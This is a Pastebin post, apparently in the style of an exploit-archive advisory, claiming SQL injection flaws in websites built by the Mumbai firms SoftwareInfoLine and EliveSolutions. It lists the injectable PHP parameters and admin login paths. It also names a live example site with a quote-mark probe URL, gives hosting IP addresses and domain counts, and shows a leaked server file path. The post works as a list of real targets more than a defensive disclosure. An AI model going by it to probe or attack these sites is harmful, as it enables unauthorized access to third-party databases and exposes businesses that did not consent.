KingSkrupellos

SoftwareInfoLine EliveSolutions SQL Injection

Mar 9th, 2019
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.42 KB | None | 0 0
  1. ######################################################################################
  2.  
  3. # Exploit Title : SoftwareInfoLine EliveSolutions SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/03/2019
  7. # Vendor Homepage : softwareinfoline.com ~ elivesolutions.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ######################################################################################
  18.  
  19. # Description About Software :
  20. ***************************
  21. SoftwareInfoline is Mumbai (Maharashtra, India) based web designing & web development company providing
  22.  
  23. Innovative Web Solutions.
  24.  
  25. ELive Solution has successfully established itself as a well versed website making company in located
  26.  
  27. in Mumbai, Maharashtra India.
  28.  
  29. ######################################################################################
  30.  
  31. # Impact :
  32. ***********
  33. SoftwareInfoLine EliveSolutions is prone to an SQL-injection vulnerability because it fails to sufficiently
  34.  
  35. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  36.  
  37. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  38.  
  39. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  40.  
  41. application and execute arbitrary SQL commands in application`s database. Further exploitation
  42.  
  43. of this vulnerability may result in unauthorized data manipulation.
  44.  
  45. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  46.  
  47. ######################################################################################
  48.  
  49. # SQL Injection Exploit :
  50. **********************
  51. /product.php?cat_id=[SQL Injection]
  52.  
  53. /product_details.php?product_id=[SQL Injection]
  54.  
  55. /page.php?page_id=[SQL Injection]
  56.  
  57. /plan_details.php?plan_id=[SQL Injection]
  58.  
  59. /news_details.php?news_id=[SQL Injection]
  60.  
  61. /play_preview_video.php?video_id=[ID-NUMBER]&plan_id=[SQL Injection]
  62.  
  63. # Admin Panel Login Path :
  64. ************************
  65. /onlinehmp/login.php
  66.  
  67. /PATH/login.php
  68.  
  69. ######################################################################################
  70.  
  71. # Example Vulnerable Sites :
  72. *************************
  73. [+] onlinehmp.in/onlinehmp/product.php?cat_id=6%27
  74.  
  75. Vulnerable IP Addresses =>
  76.  
  77. softwareinfoline.com (184.171.245.90) => There are 206 domains hosted on this server.
  78.  
  79. elivesolutions.com (208.91.199.22) => There are 687 domains hosted on this server.
  80.  
  81. onlinehmp.in (207.7.84.150) => There are 6 domains hosted on this server.
  82.  
  83. ######################################################################################
  84.  
  85. # Example SQL Database Error :
  86. ****************************
  87. Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean
  88. given in /home/onlineh18/public_html/onlinehmp/business_function.php on line 53
  89.  
  90. ######################################################################################
  91.  
  92. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  93.  
  94. ######################################################################################
Add Comment
Please, Sign In to add comment